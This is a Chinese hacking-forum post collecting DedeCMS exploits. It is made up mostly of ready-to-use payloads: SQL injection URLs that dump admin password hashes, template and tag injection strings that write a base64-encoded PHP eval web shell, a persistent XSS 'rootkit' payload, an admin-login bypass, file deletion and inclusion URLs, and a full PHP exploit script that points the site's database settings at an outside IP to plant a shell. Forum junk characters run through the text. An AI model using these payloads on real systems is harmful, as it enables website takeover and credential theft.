找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3082|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

5 j& u9 Q" j4 F6 H8 S; RDedecms 5.6 rss注入漏洞$ p5 k7 @# w4 x
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
# G- U3 x, p3 X$ `3 D9 W2 v/ |! C* v% B
# {/ @& k4 R0 w: G; S1 F: s; {% j/ [
/ T1 P9 J0 Y  I) C) D/ D$ T& {

* Y% N5 k1 W0 I
) X" w5 q- F3 x7 Z" \. }
" m! H# w/ E0 M4 l( h* C5 a! Y+ x! }8 M, |+ \& }. r) b

8 c0 I+ {' U$ p$ J( ?: t$ U$ D; ]DedeCms v5.6 嵌入恶意代码执行漏洞
4 @. {5 w( n6 ], n* f% U注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}  p  \) `2 \8 V2 v3 |
发表后查看或修改即可执行- h1 z' c5 ~9 E5 h8 E  J! X
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}5 c0 v0 K! [5 M
生成x.php 密码xiao,直接生成一句话。
1 F! _8 @  j4 M; v: h0 V- m8 ^. e/ J  Y9 l7 r2 w1 A

  @; Z, O6 X0 L# X
  L! S, H* p4 A5 Q1 c1 `$ J, q, I

  n8 O2 H8 j5 s0 X# V$ R/ `3 c8 N
3 G+ c1 O# Y2 n7 T+ x% I* _5 B8 J( h; J+ w
3 J* d# B% t% V" `5 L
Dede 5.6 GBK SQL注入漏洞
( J, p* J7 i5 D  N) r  j* c; N
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
2 {9 h/ q* i2 t: {3 C  x- x
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe2 `* O1 F( i" F4 k) C
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
8 `9 \" [: R+ C! ?5 w! E% \, P( I( v- A
) [; k& [0 z9 S  F
7 A8 N6 c6 m) C/ [* }6 M# \. ?) y" S: o
) V+ ?9 E2 i& ]# [! m3 }

9 i, J0 Y" r, {6 V7 j3 Y/ o4 O; z$ S! V8 S2 Q. a9 P

6 m: T4 W. H5 O  ^6 w, f- B& i+ ]5 q7 m; p4 w" _# k  T% C
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞0 ~4 h3 u; g- M- [% [& e
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
, x3 M5 [, m* W3 U6 K, [$ s3 P7 d0 t  I* W7 R2 L, X$ z; p
0 j/ i8 R& N) w! a
+ D' Z* G1 I/ x# g
# h) K$ W& I6 v5 j& U* ?
& J1 i8 u5 Q  f$ H
: F2 j* f7 d- s0 v% F# `
DEDECMS 全版本 gotopage变量XSS漏洞
& n/ q; n' E. e. p, N9 k+ w1 O1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 : V" B3 }% s9 D
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
, N8 p% f, `/ F+ V6 f; B; X
, I( O; y+ E4 M
* A5 i5 Z, W! _9 b. x# J2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。   E2 s1 v) g/ g5 n/ G& T" V* O
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda5 V- z  f' e0 P8 K
  r9 A8 E8 h- E$ p: b! \

: j. {: a2 t4 I) s9 [+ K  uhttp://v57.demo.dedecms.com/dede/login.php# }. q0 u3 y0 E
8 \" y" z& C1 j- T( [  F
8 p2 b- x$ x! C" v. T" H
color=Red]DeDeCMS(织梦)变量覆盖getshell; g6 Z! V8 E/ E! w. V
#!usr/bin/php -w
. w/ v- j8 _  U8 y5 `2 J<?php1 y6 t) k% B: U4 L4 ?0 \( _3 [5 `
error_reporting(E_ERROR);
# A0 k5 b. M5 k( P+ Pset_time_limit(0);6 ?  o. z! e* c1 I, E% Q
print_r(', J" K4 Q0 S. f
DEDEcms Variable Coverage* H& X1 q6 H- q; E$ A
Exploit Author:
www.heixiaozi.comwww.webvul.com3 V7 ^; J8 a, b$ A6 y# ~, x1 Q6 H
);: `: H  c/ p7 X+ b0 c' X
echo "\r\n";
3 H0 W" F% D7 y: |if($argv[2]==null){
' S# v2 I; q* [9 ]( iprint_r('+ R4 |7 C: I6 J3 z$ u
+---------------------------------------------------------------------------+
1 L2 I8 U- z" s- h1 J& P6 P4 z+ dUsage: php '.$argv[0].' url aid path" {: {& p; R4 _  q( h
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/  J) @* ?$ Y' ?0 ]% p& D0 o
Example:
: ?: k# u0 d  v9 k2 p( gphp '.$argv[0].'
www.site.com 1 old8 e' w7 b+ v9 i6 ?7 U! P8 C
+---------------------------------------------------------------------------+
5 {8 E* S3 |# U8 h; \');9 V! ?" T  p0 `& C/ v
exit;  H7 U. M: ^( b9 @, w6 X/ G
}, y! g3 T9 m# H9 B5 a( }! }% ~
$url=$argv[1];$ a( {* k! I: v
$aid=$argv[2];" |3 u# I6 I3 ]; c9 S% {2 j) L1 c* p
$path=$argv[3];/ z/ j3 l& Q# p! p, L
$exp=Getshell($url,$aid,$path);# o# [$ k. K. }
if (strpos($exp,"OK")>12){
0 f4 q2 m$ ^) n& {- T( d# b$ ?$ xecho "
& ~/ u2 l1 i4 C0 M9 ?. |Exploit Success \n";. z3 L+ u+ x( w6 a
if($aid==1)echo "
& \- w4 \& r, y% fShell:".$url."/$path/data/cache/fuck.php\n" ;
+ Z1 u# s8 E8 Y" b/ u7 V* h* w8 G& b$ O" A, X1 v4 z4 c
. T& G2 b" z1 ]) ~, ^
if($aid==2)echo "
$ J9 e/ n0 p3 m- S% x" B, K2 U4 GShell:".$url."/$path/fuck.php\n" ;% U, r, x- \2 T  N4 k3 z. x

9 Q' r) S" Y& Y4 `' e& }0 i& l  E# |" K+ n
if($aid==3)echo "& t% a% v3 u# o" w+ F- Q
Shell:".$url."/$path/plus/fuck.php\n";8 ]8 F9 i  q$ X" @: @3 @

1 Z2 o- D  l. _3 X9 V1 i+ b. ^4 L3 F" x9 [' z# R2 O( q# b2 y3 ?
}else{
3 T6 I2 t5 y- O1 n- uecho "
) o) y0 V. t" Z8 i  v3 d5 X$ jExploit Failed \n";" {3 H% F5 o+ i
}
# X; ]) w/ O7 R/ L2 afunction Getshell($url,$aid,$path){( F5 u4 M2 z& e9 t2 A+ S4 [
$id=$aid;1 \/ a$ j+ P9 @8 B
$host=$url;
+ K4 ^0 j6 X( n; Y( I" J, a: z$port="80";4 z+ ^1 W* U8 `: y+ E
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";6 p' K/ E# ~; ~8 c+ C! s- u7 ]
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
" u1 p4 v7 b, Y8 r6 D$data .= "Host: ".$host."\r\n";
' S% t6 _0 d5 o- l$ y( G) V$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
0 S, t3 j9 X6 o! s6 J' N0 _/ h4 @$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
  _$ e2 T) d# |: e( l$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
* H/ j% R0 X. Y+ p/ @! |) _+ k//$data .= "Accept-Encoding: gzip,deflate\r\n";6 N+ Y- z; C: j/ p' X3 F
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";8 ^$ l3 v$ r. ~  s7 m0 M
$data .= "Connection: keep-alive\r\n";# ~% F7 g' D- m9 N* |
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";0 j8 j. x9 M9 G+ S
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";4 M* A# T' a/ t
$data .= $content."\r\n";6 X  f7 c* L" X
$ock=fsockopen($host,$port);! b  _* M& @2 I/ u* {5 `+ t9 M
if (!$ock) {
, t! M  b1 [6 Secho "
8 @; Q, F0 k* J3 r9 ]* aNo response from ".$host."\n";4 o6 d- w6 c' x$ X+ |
}9 l/ \- z5 `8 l) d! t2 {
fwrite($ock,$data);
1 c/ P0 N1 m/ f/ I* b" A6 y5 |while (!feof($ock)) {/ Q$ |3 C4 o! c- v' f
$exp=fgets($ock, 1024);
3 h$ F4 F% v5 Ureturn $exp;% F& J7 F7 ]- ]- [: J
}* a* X' L' [) v+ x8 ~
}4 _  Y  D3 i' y- b% q

3 q8 m" a4 ^' I  A8 ^/ h
( s4 k" t8 \6 |& o- d# w?>" n% ^3 a; c! X; x) `  t% I/ p

' h/ n$ J$ @6 h1 K
* z# i0 A/ z& ~" G$ b" \7 J, Z
/ ?0 Q$ J! N2 p0 E. A1 J1 Y4 g5 A$ R( R8 j7 T6 q! Y
1 i3 g/ B2 a) ?4 K5 g6 p
5 u3 ^9 i: m# G$ k- h" ^

7 Q: @2 s' W+ c5 Z3 k" O) M, Z; N! c- E$ T3 h+ ]2 ]4 w5 l% D% X
5 c: q7 W7 I4 s, R( z

! D& }9 {+ R# q$ T! M, y# t, VDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)% Q3 L9 f, r( z4 d* `
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
0 M8 ]( _- D9 A9 q3 G3 x! L/ q: q2 L+ w  b9 w) _+ w9 E

8 o) b+ S& |4 A& X5 @- I) O7 `把上面validate=dcug改为当前的验证码,即可直接进入网站后台
4 n9 F6 w& k9 Z) G. M9 s) l- O9 J2 M7 T7 M7 [# `5 H
5 W! y: l8 S) q, W' g( r7 ?, E
此漏洞的前提是必须得到后台路径才能实现
( P5 T, e/ V8 H1 W0 n- i  j3 a7 q2 e. [: |

4 Q5 x! V: D1 @
5 l6 Y: E) g! q* [8 u  C
; O8 B/ k$ h5 M1 E: x* e
9 k% U0 ~* K% H3 [8 A. a2 i9 y+ ^& V" ]6 b4 E
3 B, C5 D' ]* y7 |  `* \

! H, j; @: ?- I/ g7 k* I( c  P$ l+ E9 v8 g- r' G
. p" w$ r* E! W6 n
Dedecms织梦 标签远程文件写入漏洞: {7 }: n5 n  m
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');- M) @6 i9 Q9 `1 R8 Q. z
2 y5 a7 }) D+ Y; B, c9 r5 z

. z  P1 m5 b2 N3 k再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 0 L' e8 L: _2 G5 f7 }9 ?
<form action="" method="post" name="QuickSearch" id="QuickSearch">9 {9 \0 T$ q$ Z+ L
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
- [8 S1 C7 i7 y) b7 {/ ?$ j<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />0 p* r$ L0 \* a  o3 }3 F6 v& F1 V
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
* b( D$ ?" ?2 Q! C, z8 T<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />; L4 D  z1 B: W
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />( {# J8 T" N6 D6 I% T, ~4 d
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
4 H- X4 ?& a) t7 \+ y<input type="text" value="true" name="nocache" style="width:400">  H8 E- }, Z, O( o8 V) N) F+ n
<input type="submit" value="提交" name="QuickSearchBtn"><br />
" G6 }% G  p  P" Z! b</form>
/ r, D$ y4 v$ P3 A, P, j<script>
  ?2 {, o5 u" ?0 }8 A4 Xfunction addaction()
, _8 |) c! d, M4 {7 A{
3 C6 `. d: ?6 w, mdocument.QuickSearch.action=document.QuickSearch.doaction.value;
! q* u! K5 A7 c}0 Z! `# T* J) G9 u
</script>: g+ Q: i* k4 \; }# A$ N  j; h5 _

2 z* V& y8 }: r; C: n; @2 z$ _5 |. K- z/ q8 ?/ L: V
6 Y. ?/ m% h( r' }+ F$ O* u8 W" l& N

0 v; r5 }% ]+ X1 o
* f  |' h0 L1 ^
( q2 S6 x+ P) ~8 G4 [  o' q( ~7 }
! f5 p4 s0 B# X4 _
+ ?# P# Z1 W. E- b2 v" E3 ^9 I; l/ j! m( E

, n9 n& X% B5 k( I4 B# `7 ]" TDedeCms v5.6 嵌入恶意代码执行漏洞& L7 O2 C7 L# i5 p
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
: }) Z  p! H& W" _! X, e3 J# xa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
. f; v$ U* a& Z9 Q6 b生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得: l( @7 a" \. b1 d4 P# k+ N2 m
Dedecms <= V5.6 Final模板执行漏洞/ f) \* _5 P* s! p
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
, v7 R1 I- x( t* Duploads/userup/2/12OMX04-15A.jpg8 m2 P, p. c3 t
4 Q4 I. F  A  o- t: ~. i/ `

9 f" n9 V% t/ R3 _: K模板内容是(如果限制图片格式,加gif89a):  q& j% }/ I# @
{dede:name runphp='yes'}, }7 V% d# ^- j. V  g
$fp = @fopen("1.php", 'a');" v/ ^8 i+ \  h6 w
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");0 C; a: T2 a  A2 ]
@fclose($fp);6 x0 p+ e& x- |8 I8 L
{/dede:name}
6 j. |' ~, k( X0 d2 修改刚刚发表的文章,查看源文件,构造一个表单:
8 u  x) K% R( B8 A7 P. z<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
! u* \/ m! T' g* a<input type="hidden" name="dopost" value="save" />
+ g, q9 ~" R5 k: ?( n; r' e<input type="hidden" name="aid" value="2" />: ]$ x3 B- `6 _4 k  [2 W+ b
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
2 c( u6 S5 r$ A: k4 i. D% n<input type="hidden" name="channelid" value="1" />0 P4 o! U) q9 d0 y  R0 |, D
<input type="hidden" name="oldlitpic" value="" />" x: }9 s8 m3 O9 E) k3 W2 ?6 o
<input type="hidden" name="sortrank" value="1275972263" />
* J$ L5 f( G$ u9 s: U: D/ O
9 t. q  |7 o9 v' j
: b, g+ v+ L1 O# V  {; F# x<div id="mainCp">
/ ~# O9 e, l% b, k<h3 class="meTitle"><strong>修改文章</strong></h3>
/ X. X' p; |% [3 v# _1 h' D
8 w& M. X% P) K# _4 a; _7 c* w" ^1 b. Y! h+ j
<div class="postForm">
! O7 [# v: S9 K- c2 j<label>标题:</label>" L* O# v( t; \) {% T: w, R
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
4 z- l" O3 T/ S
8 ], {; B: P8 Z3 d* o3 e
8 P$ `" t5 u0 ?9 r2 k- C<label>标签TAG:</label>
( t  W: d  U  `3 i7 t" x+ f<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)/ @* ^; s& s( C/ O

/ c1 _$ U0 v$ x/ g9 n- o' V: s
) Y* w9 H7 s  _/ @  |. _<label>作者:</label>
) }! `# v  O+ N( V1 N<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
: ~8 r5 l$ Q/ Y4 \8 [; W; g0 n. _0 W/ Q/ U* Y

( |4 L, h- L" ~3 v/ M7 d" |<label>隶属栏目:</label>* Z: u; }' Y( |% C' |+ Y! ^
<select name='typeid' size='1'>, p* a% U5 B4 e3 w
<option value='1' class='option3' selected=''>测试栏目</option>$ [4 ?0 J) O6 p% S$ b
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
3 u0 I5 t! j5 ^% f/ L+ \+ F$ H$ g3 v/ L0 |/ _0 X

% e2 t4 l' }! R' o<label>我的分类:</label>
6 |, {  t8 s; T  Y& a<select name='mtypesid' size='1'>
4 _' C0 x. \# \" y<option value='0' selected>请选择分类...</option>
3 y8 V" Y$ V  i. M6 U; m<option value='1' class='option3' selected>hahahha</option>( s6 ]& y5 Q, Z9 s  l( {5 w
</select>+ h# f5 D- r( X8 R5 `, H
* S& i8 B" o. R1 m8 p) v6 p
/ o4 z: I4 G+ z4 b
<label>信息摘要:</label>% p, C+ R, U/ M5 g1 W9 K
<textarea name="description" id="description">1111111</textarea>
) W: p- ]* w& x: Y( v0 t" H+ q1 |! K7 S(内容的简要说明)
1 Y# c& A. {. M! _& }( l* p+ S3 K' k! e, w- H
& x( u, U2 T9 L" y  Y
<label>缩略图:</label>
2 Z1 O2 U7 ?1 G+ j, o4 A9 V<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>- ~! H  h' V1 {, G8 X$ ~
* j8 ~. B8 b* ~. C. Y* Z$ U

3 ^' g# L( g# q( Z; q  }, F" T<input type='text' name='templet'; o' s1 ]' ~0 R3 S9 r) Q6 F
value="../ uploads/userup/2/12OMX04-15A.jpg">. H5 G/ \; H* q( C5 B
<input type='text' name='dede_addonfields'6 ]) T5 ^: _8 J; h0 q3 ]
value="templet,htmltext;">(这里构造)
) H6 a6 l6 @+ b; T% x6 @, S</div>) F' |0 V; q2 f2 X! P( z% e  _
4 [7 R) V; }; x' \/ i% Y% Z

% e' b* Q, }; l# B) Q7 n3 W9 l<!-- 表单操作区域 -->
- D0 ]' {, r2 R<h3 class="meTitle">详细内容</h3>
: j, @, `3 [1 C3 a8 U, ?
& ]( b! _& M' L& T; d: c) |% r+ f( U" s; H
<div class="contentShow postForm">) J7 K1 z2 [6 s7 S* u; Q
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>/ d/ M/ X$ K6 \% l+ o. U

& J6 v: L8 S0 i5 d
3 N/ u5 e, k, X8 q" R1 l  U<label>验证码:</label>
' p1 H) i5 x% `4 ~  S. P0 o. v% l<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
" l* y0 p% ~+ d/ M2 D8 B# {<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
- r3 Y7 A* ?1 i2 k: X4 v9 r. b; K: x" k( F) [' E, L! t. [/ t, P

* j$ G' G: o- W6 Q  q<button class="button2" type="submit">提交</button>- ?0 t1 s: G* T# {. `/ a
<button class="button2 ml10" type="reset">重置</button>5 h& I2 H/ f% ]* @
</div>& B& s+ L5 b1 q9 {8 a

; A; V3 a- t5 O/ A# v" ^# Z: H1 |
! _$ Y, F3 |& R) G5 e9 E</div>
: ^& W& a; q" H6 L# m0 o
% ~. M# {7 `9 {" a: S4 p$ {& M# M1 A$ ^. n5 H7 {
</form>
- P) k0 P8 `8 {1 L8 q# E+ u- _! T; g' q

' i, i+ ~8 O0 [+ ?& {, l8 \提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
3 C2 w: v0 ?3 Z0 E假设刚刚修改的文章的aid为2,则我们只需要访问:& i* g/ h" `# W( b$ d1 T
http://127.0.0.1/dede/plus/view.php?aid=2
4 t5 l$ U  X- T" v& U5 W" [即可以在plus目录下生成webshell:1.php( ^: w4 P) I0 d* g* X
% U3 ]+ y" E/ b& |
0 G3 C1 ^! W( W) Y

" G$ e! r. e0 h8 u
9 h- G, R2 B7 R8 \
; J, z' |) H7 E5 ?9 t, ^% ~, S! x1 y# b
. f. u. T$ h; C$ h# L3 B
9 L* W0 |- c  L8 Z$ F4 u& R8 ^* G1 m2 P' I9 R/ d4 p# s
, l( K: L+ s! i$ Q( u

9 g0 n( W' C7 O: T# _& q5 Q- E# Q- p

! R1 l. n/ ]3 eDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
' v: F  ~; Y$ w6 W/ LGif89a{dede:field name='toby57' runphp='yes'}
6 \" r" A/ @% H4 m: x; @, q* b0 nphpinfo();
) A+ `! M0 F& j+ A( @, t{/dede:field}1 ]; Q+ A8 I$ m4 w0 r
保存为1.gif
% v) ~- Y7 X6 @4 g) F( A<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
' P. p, e# B0 J' k* g; U<input type="hidden" name="aid" value="7" /> 1 x6 }$ f( s& _' \+ v0 f' g9 N  g
<input type="hidden" name="mediatype" value="1" />
; {5 A* N# g8 U8 c( [% k<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
/ h/ Z7 _# G) B2 E<input type="hidden" name="dopost" value="save" />
7 G8 b1 A/ X9 ?5 M7 s<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 3 _0 {1 Y- o! H6 C8 X
<input name="addonfile" type="file" id="addonfile"/>
) i( x( h4 [# v: o<button class="button2" type="submit" >更改</button> 9 l/ o& D2 G3 Q9 I! f, ~: q: |
</form>
9 R: v/ z7 I% |# z9 R" b7 t0 \6 y' P0 T5 f: \
2 u+ C: c2 k# A$ a; q" d
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
9 u2 c1 m- i! A7 f9 t发表文章,然后构造修改表单如下:
5 M# Y7 h3 M3 ^8 c" R7 {
* X7 j" s) x+ Q7 j/ r5 K. A1 s) a3 l# W& _- h  `
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> . ^4 a) N2 C$ D' m
<input type="hidden" name="dopost" value="save" />
" U& C; Q+ V8 M- Y<input type="hidden" name="aid" value="2" /> 9 y8 B2 b9 I& ^- O, m# C- a3 n
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
, V" z$ j$ q, u0 g. H<input type="hidden" name="channelid" value="1" /> 8 |% F* l% Q8 Q1 g6 {' D
<input type="hidden" name="oldlitpic" value="" /> $ e! \3 P$ E/ N6 F9 o" Z1 g
<input type="hidden" name="sortrank" value="1282049150" /> 9 J4 r: v5 s/ |) a' s% M7 L  D" U
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
! ~  v0 E  K5 `, ~+ O9 s- g6 z+ C<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> ( X, F: |6 p. A- U
<select name='typeid' size='1'> ( }; J" Z, L. Z8 P" y; J
<option value='1' class='option3' selected=''>Test</option> ! g) ]% S8 n  Y% v! `% S
<select name='mtypesid' size='1'> / X6 {# a/ e' z- F2 h9 p
<option value='0' selected>请选择分类...</option> ) }) i) n* t' L* F. }: ]
<option value='1' class='option3' selected>aa</option></select> , f# G5 c0 U1 A' y( ^$ n2 Z
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
$ l2 k* K8 a& v/ d' @<input type='hidden' name='dede_addonfields' value="templet"> 9 W) h8 {& a! Y
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
" X4 e1 l1 |: q0 Q$ [, p% f/ t<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
' O/ R8 _" D8 b/ y5 T<button class="button2" type="submit">提交</button> * ~$ l, ?  j$ E1 P" W2 F
</form>
" \' ?1 y6 K0 R  o0 |1 A, L8 d7 X. E
7 ~' t% R% f& w1 [1 e7 O
; L( E# o9 ^- O' K, n* f8 V
, F  u7 M6 j& M( \$ V
& J' p" ?5 z3 s! J$ g4 Q3 o
6 j* A) R$ Z6 ~8 f- O
% \& @! h! K; b, b! w
* a" F. E8 }5 s/ G0 h9 I
: v6 b/ p2 a+ Z: G' J) z! }2 f# C3 ^# T  s8 |; C1 l& ]$ {3 `

0 w3 Q1 H# q3 i3 t
9 G" v1 _6 u7 X/ n* x- a+ n) I- Z. z9 \* K
织梦(Dedecms)V5.6 远程文件删除漏洞
! [" k' W, |* O) Q' B, a) J6 v/ M
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif' ~7 O) [7 I4 s9 D

. m3 \/ W+ E7 R! e% r1 U
* h* j: U& Y, f7 e, E; ?; v" {9 T. s  z/ z- ^! A

7 G4 n$ ^' d' O3 V
# y0 @% G1 }( r" G* _  z( h0 a/ T1 G
( ]/ U& t2 i6 ^; P6 l
4 O3 e+ ]2 n8 d+ c( `2 |
9 U9 \; b. K' s
- T/ @9 Y1 Z2 ?
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
, [# k( d" m5 O6 x
http://www.test.com/plus/carbuya ... urn&code=../../( ~7 u4 p2 ], l8 ?1 d

, B: l7 B* Z  |" E/ K' P2 s3 |, v$ O$ }4 `6 X6 V

) ~$ p9 z7 b0 {' W  d$ r" T2 I- ]! ~1 y, @

# p: i' V% W- t- l4 O7 h4 g, ?
# Z- [0 p  [8 A$ I- n. h$ T* v$ N, ]7 W1 A" C8 j7 B

  H5 |2 c, H7 p9 |+ }9 G1 U& s! v
$ B% Q8 F% `& t0 @& q6 t+ w7 u6 d% W- B$ q- {& j
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
: V( t5 |5 J3 I; L$ c8 U7 r0 v( xplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
1 |+ X6 j) a+ v9 m: T7 w/ p1 B密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5& Q2 w9 L+ `' J4 w

: w( H" S, W) C  W1 g4 G  s2 N8 i7 T7 \
9 ?5 Z8 G# k% Z/ [8 B! R! M
; ~6 ?& M& N* C2 T% Z, O! k! ?
% F. a* ?0 x( V$ G6 }7 M

) V' |, j5 z, x( B* X7 {
8 ?; ]; X4 T* U" k. i/ R
% B6 D' k: M# ~1 U' d* G" x9 j# q5 a4 l. |
8 ]2 r- J+ L8 {* H& c1 t2 D
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
